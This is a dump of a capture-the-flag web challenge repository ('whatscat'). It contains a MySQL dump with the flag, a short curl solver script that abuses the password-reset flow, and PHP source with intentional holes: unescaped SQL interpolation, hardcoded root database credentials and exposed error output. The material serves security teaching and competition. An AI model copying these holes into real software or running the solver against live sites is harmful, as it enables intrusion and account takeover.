@@character_set_client */; 25 | /*!40101 SET character_set_client = utf8 */; 26 | CREATE TABLE `comments` ( 27 | `uid` int(11) DEFAULT NULL, 28 | `pid` int(11) DEFAULT NULL, 29 | `comment` varchar(2000) DEFAULT NULL 30 | ) ENGINE=InnoDB DEFAULT CHARSET=latin1; 31 | /*!40101 SET character_set_client = @saved_cs_client */; 32 | 33 | -- 34 | -- Dumping data for table `comments` 35 | -- 36 | 37 | LOCK TABLES `comments` WRITE; 38 | /*!40000 ALTER TABLE `comments` DISABLE KEYS */; 39 | /*!40000 ALTER TABLE `comments` ENABLE KEYS */; 40 | UNLOCK TABLES; 41 | 42 | -- 43 | -- Table structure for table `flag` 44 | -- 45 | 46 | DROP TABLE IF EXISTS `flag`; 47 | /*!40101 SET @saved_cs_client = @@character_set_client */; 48 | /*!40101 SET character_set_client = utf8 */; 49 | CREATE TABLE `flag` ( 50 | `flag` varchar(200) DEFAULT NULL 51 | ) ENGINE=InnoDB DEFAULT CHARSET=latin1; 52 | /*!40101 SET character_set_client = @saved_cs_client */; 53 | 54 | -- 55 | -- Dumping data for table `flag` 56 | -- 57 | 58 | LOCK TABLES `flag` WRITE; 59 | /*!40000 ALTER TABLE `flag` DISABLE KEYS */; 60 | INSERT INTO `flag` VALUES ('20billion_d0llar_1d3a'); 61 | /*!40000 ALTER TABLE `flag` ENABLE KEYS */; 62 | UNLOCK TABLES; 63 | 64 | -- 65 | -- Table structure for table `pictures` 66 | -- 67 | 68 | DROP TABLE IF EXISTS `pictures`; 69 | /*!40101 SET @saved_cs_client = @@character_set_client */; 70 | /*!40101 SET character_set_client = utf8 */; 71 | CREATE TABLE `pictures` ( 72 | `pid` int(11) DEFAULT NULL, 73 | `path` varchar(50) DEFAULT NULL 74 | ) ENGINE=InnoDB DEFAULT CHARSET=latin1; 75 | /*!40101 SET character_set_client = @saved_cs_client */; 76 | 77 | -- 78 | -- Dumping data for table `pictures` 79 | -- 80 | 81 | LOCK TABLES `pictures` WRITE; 82 | /*!40000 ALTER TABLE `pictures` DISABLE KEYS */; 83 | INSERT INTO `pictures` VALUES (0,'cat1.jpg'),(1,'cat2.jpg'),(2,'cat3.jpg'),(3,'dog1.jpg'),(4,'trex.jpg'),(5,'lion.jpg'),(6,'cat4.jpg'); 84 | /*!40000 ALTER TABLE `pictures` ENABLE KEYS */; 85 | UNLOCK TABLES; 86 | 87 | -- 88 | -- Table structure for table `users` 89 | -- 90 | 91 | DROP TABLE IF EXISTS `users`; 92 | /*!40101 SET @saved_cs_client = @@character_set_client */; 93 | /*!40101 SET character_set_client = utf8 */; 94 | CREATE TABLE `users` ( 95 | `id` int(11) NOT NULL AUTO_INCREMENT, 96 | `username` varchar(100) NOT NULL, 97 | `email` varchar(1000) DEFAULT NULL, 98 | `password` varchar(100) DEFAULT NULL, 99 | `resetinfo` varchar(2000) DEFAULT NULL, 100 | PRIMARY KEY (`id`), 101 | UNIQUE KEY `username` (`username`) 102 | ) ENGINE=InnoDB DEFAULT CHARSET=latin1; 103 | /*!40101 SET character_set_client = @saved_cs_client */; 104 | 105 | -- 106 | -- Dumping data for table `users` 107 | -- 108 | 109 | LOCK TABLES `users` WRITE; 110 | /*!40000 ALTER TABLE `users` DISABLE KEYS */; 111 | /*!40000 ALTER TABLE `users` ENABLE KEYS */; 112 | UNLOCK TABLES; 113 | /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */; 114 | 115 | /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; 116 | /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; 117 | /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; 118 | /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; 119 | /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; 120 | /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; 121 | /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; 122 | 123 | -- Dump completed on 2014-03-30 21:06:05 124 | -------------------------------------------------------------------------------- /web/whatscat/solver.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | USERNAME=${RANDOM}_tester 4 | 5 | curl --silent -g "http://[2001:470:8:f7d::1]/index.php?page=login" --data "name=${USERNAME}&pass=${USERNAME}&email=poop®ister=1" > /dev/null 6 | 7 | curl --silent --interface 2001:470:8:f81::2 -g "http://[2001:470:8:f7d::1]/index.php?page=login" --data "name=${USERNAME}&reset=1" > /dev/null 8 | 9 | curl --silent -g "http://[2001:470:8:f7d::1]/index.php?page=login" --data "name=${USERNAME}&reset=1" | grep email 10 | -------------------------------------------------------------------------------- /web/whatscat/to_host/cat: -------------------------------------------------------------------------------- 1 | pid; 15 | $path = $res->path; 16 | 17 | echo "
    "; 18 | echo ""; 19 | $q2 = mysql_query("select (select username from users where uid = id),comment from comments where pid=$id"); 20 | if ($q2) { 21 | echo "
      "; 22 | while ($res2 = mysql_fetch_row($q2)) { 23 | echo sprintf("
    • %s says: %s
      • ", 24 | rand(0,200),rand(0,400),htmlentities($res2[0]),htmlentities($res2[1])); 25 | } 26 | echo "
    "; 27 | } 28 | if (isset($_SESSION['uid'])) { 29 | echo << 31 |
    32 | 33 | 34 | 35 |
    36 | 37 | CAT; 38 | } 39 | echo "
    "; 40 | } 41 | 42 | ?> 43 | -------------------------------------------------------------------------------- /web/whatscat/to_host/cat.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/web/whatscat/to_host/cat.jpg -------------------------------------------------------------------------------- /web/whatscat/to_host/default.css: -------------------------------------------------------------------------------- 1 | img.logo { 2 | display: block; 3 | margin-left: auto; 4 | margin-right: auto; 5 | } 6 | p { 7 | font-family: sans-serif; 8 | } 9 | a{ 10 | color: white; 11 | size: 18px; 12 | font-family: sans-serif; 13 | text-decoration: none; 14 | vertical-align: middle; 15 | } 16 | a.other { 17 | color: black; 18 | vertical-align: top; 19 | } 20 | a:hover { 21 | text-decoration: underline overline; 22 | } 23 | #links { 24 | margin-left: auto; 25 | margin-right: auto; 26 | background: purple; 27 | opacity: 0.6; 28 | height: 21px; 29 | width: 75%; 30 | } 31 | #links li { 32 | width: 15%; 33 | text-align: center; 34 | display:-moz-inline-block; 35 | display:-moz-inline-box; 36 | display:inline-block; 37 | } 38 | body { 39 | margin:0; 40 | padding:0; 41 | background: #d6d6cc url('cat.jpg') repeat; 42 | } 43 | #box { 44 | background: rgba(255,255,255,0.5) ; 45 | margin: auto; 46 | width: 75%; 47 | border: 3px solid #555; 48 | padding: 16px; 49 | } 50 | #inbox { 51 | color: #000; 52 | } 53 | #footer { 54 | margin: auto; 55 | width: 80%; 56 | text-align: center; 57 | font-size:8.5px; 58 | color: #555; 59 | } 60 | .annotated{ 61 | position:relative; 62 | /*display:inline-block; If you do not need to support IE7 and below uncomment this line and remove the inline width and height styles on the
    in your markup. */ 63 | } 64 | .annotated img{ /* Set this to stop white-space appearing under the image. */ 65 | display:block; 66 | } 67 | .annotated b{ /* Hide the figcaption’s title. */ 68 | position:absolute; 69 | left:-99999px; 70 | } 71 | .annotated ul{ /* Set up the canvas for the annotations to sit on. */ 72 | list-style:none; 73 | position:absolute; 74 | top:0; 75 | right:0; 76 | bottom:0; 77 | left:0; 78 | } 79 | .annotated li{ 80 | display:block; 81 | padding:0 5px; 82 | /* Give them a width and a line-height suitable for your kind of images. I chose 50px. */ 83 | width:20px; /* 40px + 5px padding-right + 5px padding-left = 50px */ 84 | line-height:30px; 85 | position:absolute; 86 | text-indent:-99999px; /* Hide the text off-screen. */ 87 | white-space:nowrap; /* Stop the annotations breaking onto several lines. */ 88 | cursor:default; 89 | } 90 | .annotated:hover li{ /* When we hover the figure show us where the annotations are. */ 91 | border:1px solid #fff; 92 | } 93 | .annotated li:hover { /* Show the text on hover. */ 94 | background:#fff; 95 | background:rgba(255,255,255,0.75); 96 | z-index:2; /* Bring current annotation above others. */ 97 | /* Remove the width and text-indent to show us our text! */ 98 | width:auto; 99 | text-indent:0; 100 | 101 | /* A bit o’ progressive enhancement */ 102 | -webkit-box-shadow:0 0 5px rgba(0,0,0,0.25); 103 | -moz-box-shadow:0 0 5px rgba(0,0,0,0.25); 104 | box-shadow:0 0 5px rgba(0,0,0,0.25); 105 | } 106 | -------------------------------------------------------------------------------- /web/whatscat/to_host/foot.php: -------------------------------------------------------------------------------- 1 | 4 | -------------------------------------------------------------------------------- /web/whatscat/to_host/head.php: -------------------------------------------------------------------------------- 1 | 14 | -------------------------------------------------------------------------------- /web/whatscat/to_host/imgs/cat1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/web/whatscat/to_host/imgs/cat1.jpg -------------------------------------------------------------------------------- /web/whatscat/to_host/imgs/cat2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/web/whatscat/to_host/imgs/cat2.jpg -------------------------------------------------------------------------------- /web/whatscat/to_host/imgs/cat3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/web/whatscat/to_host/imgs/cat3.jpg -------------------------------------------------------------------------------- /web/whatscat/to_host/imgs/cat4.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/web/whatscat/to_host/imgs/cat4.jpg -------------------------------------------------------------------------------- /web/whatscat/to_host/imgs/dog1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/web/whatscat/to_host/imgs/dog1.jpg -------------------------------------------------------------------------------- /web/whatscat/to_host/imgs/lion.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/web/whatscat/to_host/imgs/lion.jpg -------------------------------------------------------------------------------- /web/whatscat/to_host/imgs/trex.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/web/whatscat/to_host/imgs/trex.jpg -------------------------------------------------------------------------------- /web/whatscat/to_host/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | WhatsCat 5 | 6 | 7 | 8 |
    9 | 10 | 11 | 12 | 13 |
    14 |
    15 | 24 |
    25 |
    26 | 27 |
    28 | 29 | 30 | 31 | -------------------------------------------------------------------------------- /web/whatscat/to_host/login: -------------------------------------------------------------------------------- 1 | 6 |

    User name:

    7 |

    8 |

    Password:

    9 |

    10 |

    Email:

    11 |

    12 | 13 | CAT; 14 | } 15 | 16 | mysql_connect("localhost","root","123456"); 17 | mysql_select_db("whatscat"); 18 | 19 | 20 | if (isset($_SESSION['uid'])) { 21 | $q = mysql_query("select username from users where id=".$_SESSION['uid']); 22 | $res = mysql_fetch_object($q); 23 | echo sprintf("You're so silly %s, you're already logged in!",$res->username); 24 | } 25 | 26 | else { 27 | if (isset($_POST["login"])) { 28 | $q = mysql_query(sprintf("select id,username from users where username='%s' and password='%s'", 29 | mysql_real_escape_string($_POST["name"]),mysql_real_escape_string($_POST["pass"]))); 30 | $res = mysql_fetch_object($q); 31 | if (empty($res)) { 32 | echo "Hm.. that username password combination seems invalid"; 33 | pform(); 34 | } 35 | else { 36 | $_SESSION['uid'] = $res->id; 37 | echo sprintf("Welcome back, %s!",$res->username); 38 | } 39 | } 40 | elseif (isset($_POST["register"])) { 41 | if (empty($_POST["name"]) or empty($_POST["email"]) or empty($_POST["pass"])) { 42 | echo "

    Please fill out all the fields!

    "; 43 | pform(); 44 | } 45 | else { 46 | $q = mysql_query(sprintf("insert into users (username,password,email) values 47 | ('%s', '%s', '%s')",mysql_real_escape_string($_POST["name"]), 48 | mysql_real_escape_string($_POST["pass"]),mysql_real_escape_string($_POST["email"]))); 49 | if ($q) { 50 | echo "Success!"; 51 | } 52 | else { 53 | echo sprintf("%s",mysql_error()); 54 | } 55 | } 56 | } 57 | elseif (isset($_POST["reset"])) { 58 | $q = mysql_query(sprintf("select username,email,id from users where username='%s'", 59 | mysql_real_escape_string($_POST["name"]))); 60 | $res = mysql_fetch_object($q); 61 | $pwnew = "cat".bin2hex(openssl_random_pseudo_bytes(8)); 62 | if ($res) { 63 | echo sprintf("

    Don't worry %s, we're emailing you a new password at %s

    ", 64 | $res->username,$res->email); 65 | echo sprintf("

    If you are not %s, we'll tell them something fishy is going on!

    ", 66 | $res->username); 67 | $message = <<email,"whatscat password reset",$message.$details,"From: whatscat@whatscat.cat\r\n"); 76 | mysql_query(sprintf("update users set password='%s', resetinfo='%s' where username='%s'", 77 | $pwnew,$details,$res->username)); 78 | } 79 | else { 80 | echo "Hmm we don't seem to have anyone signed up by that name"; 81 | } 82 | 83 | } 84 | else { 85 | pform(); 86 | } 87 | } 88 | 89 | ?> 90 | -------------------------------------------------------------------------------- /web/whatscat/to_host/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwning/plaidctf2014/1bf225f52a6501dac74044b176df39538de34c43/web/whatscat/to_host/logo.png -------------------------------------------------------------------------------- /web/whatscat/to_host/logout: -------------------------------------------------------------------------------- 1 | username); 6 | unset($_SESSION['uid']); 7 | } 8 | else { 9 | echo "You weren't even logged in, silly!"; 10 | } 11 | ?> 12 | -------------------------------------------------------------------------------- /web/whatscat/to_host/main: -------------------------------------------------------------------------------- 1 | Welcome to WhatsCat! This website is dedicated to determining, once and for all, what is a cat. Check out our cat page, where we let our users decide! If you have opinions about whether or not something is a cat and would like to join in the discussion, sign up today! 2 | --------------------------------------------------------------------------------